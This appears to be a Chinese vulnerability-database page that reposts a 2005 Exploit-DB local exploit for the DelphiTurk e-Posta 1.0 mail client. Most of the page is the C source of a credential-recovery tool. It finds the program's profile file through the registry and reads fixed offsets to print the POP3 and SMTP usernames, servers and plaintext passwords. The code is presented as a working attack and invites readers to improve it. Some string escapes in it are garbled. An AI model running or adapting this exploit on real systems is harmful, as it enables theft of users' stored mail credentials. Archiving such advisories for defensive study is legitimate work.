DelphiTurk e-Posta 1.0 – Credential Recover

DelphiTurk e-Posta 1.0 – Credential Recover

漏洞ID 1054894 漏洞类型
发布时间 2005-02-10 更新时间 2005-02-10
图片[1]-DelphiTurk e-Posta 1.0 – Credential Recover-安全小百科CVE编号 N/A
图片[2]-DelphiTurk e-Posta 1.0 – Credential Recover-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/811
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*****************************************************************

DelphiTurk e-Posta v1.0 Local Exploit by Kozan

Application: DelphiTurk e-Posta v1.0
Procuder: Delphiturk.com
Vulnerable Description: DelphiTurk e-Posta v1.0  discloses
                                               passwords to local users.

Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *bilgi_oku(int adres,int uzunluk)
{

       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                       "SOFTWARE\Microsoft\Windows\CurrentVersion",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
              (LPBYTE) prgfiles, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!");
                                return 0;
                       }

                       RegCloseKey(hKey);

   }else{
               printf("An error occured!n");
               exit(1);
       }

 strcat(prgfiles,"\Delphi Turk\Delphi Türk e-Posta
1.0\Settings\Profiles.adt");

 int i;
 FILE *fp;
 char ch[100];
 if((fp=fopen(prgfiles,"rb")) == NULL)
 {
 return "false";
 }
 fseek(fp,adres,0);
 for(i=0;i<uzunluk;i++)
 ch[i]=getc(fp);
 ch[i]=NULL;
 fclose(fp);
 return ch;
}

int main()
{

printf("rnrnDelphiTurk e-Posta v1.0 Local Exploit by Kozann");
printf("Credits to ATmaCAn");
printf("www.netmagister.com   -   www.spyinstructors.com rnrn");
printf("This example exploit only shows the first record.rn");
printf("You may improve it freely...rnrn");
printf("ProfileName           : %sn",bilgi_oku(3609,25));
printf("Profile UserName      : %sn",bilgi_oku(3634,50));
printf("Profile MailAddress   : %sn",bilgi_oku(3684,40));
printf("Pop3 Mail Server      : %sn",bilgi_oku(3724,52));
printf("Pop3 UserName         : %sn",bilgi_oku(3776,50));
printf("Pop3 Password         : %sn",bilgi_oku(3826,50));
printf("Smtp Mail Server      : %sn",bilgi_oku(3976,52));
printf("Smtp UserName         : %sn",bilgi_oku(3928,50));
printf("Smtp Password         : %sn",bilgi_oku(3978,46));

return 0;

}

// milw0rm.com [2005-02-10]

相关推荐: Gattaca Server 2003 Multiple Path Disclosure Vulnerabilities

Gattaca Server 2003 Multiple Path Disclosure Vulnerabilities 漏洞ID 1098263 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2004-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享